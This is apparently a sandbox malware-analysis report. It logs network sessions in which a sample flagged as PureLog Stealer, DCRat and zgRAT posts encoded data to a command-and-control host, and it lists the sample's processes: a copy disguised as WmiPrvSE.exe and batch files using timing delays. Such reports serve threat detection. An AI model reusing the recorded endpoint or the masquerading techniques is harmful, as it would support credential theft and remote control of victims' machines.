54cVJ~oT{LdI_g}g{cuBzZs]j\Vt`~Pnqf_vfd~KxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[bY~cjYogpClYQ^lS^Xy\lHl`b}pcYywVJ\|bx\v_dzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lStBp
Oct 27, 2024 02:45:34.785379887 CEST	900	IN	Data Raw: 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 00 77 Data Ascii: M]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`\

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50021	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:41.573242903 CEST	337	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:41.921638966 CEST	344	OUT	Data Raw: 00 00 01 07 06 0a 01 0b 05 06 02 01 02 03 01 06 00 0a 05 08 02 04 03 0e 02 04 0c 54 06 50 01 03 0c 04 03 0e 00 03 04 52 0e 50 05 0a 06 53 05 00 05 03 0c 00 0f 50 07 0b 01 05 05 05 07 52 04 01 02 54 0c 0b 06 56 05 08 0b 03 0f 57 0a 0c 0e 05 04 00 Data Ascii: TPRPSPRTVWWZPS\L~hzMtbav\h\|l}`B]XhZ`IoR]HxpbIhncP`gk\~e~V@{m\A}ri
Oct 27, 2024 02:45:42.170876026 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:42.496515036 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wR7aMrvTax4RIfMKSEHl5SpO5SxOpNQfTwyLVecByFezKuo64khSywQR9eDlGqgow5OuG8R5M4fcr6lL5m18El4gBHTWPvGFB71e%2Fy4afgECUt7i5rWTnhRMRcUboRjqilBOWxux0g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8eaa323819485c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=1083832&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 59 78 6e 74 5e 78 04 68 46 7c 71 7f 03 7d 5e 64 53 6b 70 61 40 6d 4d 51 5d 7e 72 74 05 60 5a 69 08 7a 61 69 06 61 5f 63 5a 7d 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 5b 03 6a 59 6a 59 78 59 68 07 78 64 73 5f 78 53 56 59 79 71 70 46 6c 63 5b 5d 6b 06 77 5b 7b 59 6c 02 7d 72 70 5b 76 72 7c 49 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}Yxnt^xhF\|q}^dSkpa@mMQ]~rt`Zizaia_cZ}[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\[jYjYxYhxds_xSVYyqpFlc[]kw[{Yl}rp[vr\|IzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lStB
Oct 27, 2024 02:45:42.496530056 CEST	901	IN	Data Raw: 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 00 Data Ascii: pM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50022	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:45:53.803710938 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:45:54.156109095 CEST	344	OUT	Data Raw: 05 05 01 01 06 08 04 00 05 06 02 01 02 0c 01 03 00 05 05 0d 02 06 03 01 00 05 0c 02 05 05 03 07 0d 0e 05 0e 00 06 06 01 0b 0b 06 0a 06 00 02 07 04 06 0d 08 0d 04 04 00 06 50 03 04 04 06 07 5c 01 04 0d 0b 06 02 07 03 0c 0e 0f 0f 0f 50 0b 06 06 06 Data Ascii: P\P\L}SYu[vruvu\|BSLtl]\h]plo`XxaY\|m]Utk[~_~V@x}n}\[
Oct 27, 2024 02:45:54.404151917 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:45:54.718784094 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:45:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nuSZ4OfCmSpEsUMSG4oe8qi8tB%2BfIlrybmvDR6iwu5HUb09x9czUmcwjeXbel0Cfb1AP2K17RNZin2xG8QTuG%2FJevMa8SzKIJSRtbSI39OLMC%2F5O%2FsoshlyEiX3Z0ppfTBetxTFAZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8eaa7eaed26b2e-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1835&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=805787&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5e 6c 43 68 5e 7b 72 7c 01 6b 72 74 5a 7e 59 73 42 7f 4e 5b 08 7a 73 60 4c 7f 71 78 49 77 73 57 09 6e 5f 76 5b 76 58 7c 03 7d 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 6d 4a 7d 60 72 59 6f 59 78 05 7b 01 6f 58 79 6e 64 5c 6d 62 7b 5d 6f 5a 66 04 7f 5e 60 00 78 77 74 4a 6a 62 7f 4d 62 71 5d 5c 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}^lCh^{r\|krtZ~YsBN[zs`LqxIwsWn_v[vX\|}axUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[mJ}`rYoYx{oXynd\mb{]oZf^`xwtJjbMbq]\zQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lS
Oct 27, 2024 02:45:54.718810081 CEST	903	IN	Data Raw: 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c Data Ascii: tBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W

Target ID:	0
Start time:	20:42:02
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\9D7RwuJrth.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\9D7RwuJrth.exe"
Imagebase:	0x410000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1727163824.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1768667398.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:42:06
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:42:06
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:42:06
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:42:06
Start date:	26/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75b810000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:42:11
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0xb0000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:42:15
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:42:15
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:42:15
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:42:15
Start date:	26/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff79a6e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:42:25
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0xac0000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:42:28
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	20:42:28
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:42:28
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:42:28
Start date:	26/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75b810000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	20:42:34
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0xb90000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	20:42:38
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grDS520PRI.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:42:38
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:42:38
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:42:38
Start date:	26/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75b810000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:42:43
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0x4d0000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:42:47
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	20:42:47
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:42:47
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:42:47
Start date:	26/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff79a6e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:42:57
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0x980000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:43:00
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:43:00
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:43:00
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	20:43:01
Start date:	26/10/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75b810000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:43:06
Start date:	26/10/2024
Path:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Imagebase:	0xc50000
File size:	3'408'384 bytes
MD5 hash:	0AD0B4A4A549230E090D712B5521BD96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:43:10
Start date:	26/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"
Imagebase:	0x7ff7f2b30000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	20:43:10
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	20:43:10
Start date:	26/10/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e2890000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	20:43:10
Start date:	26/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff79a6e0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

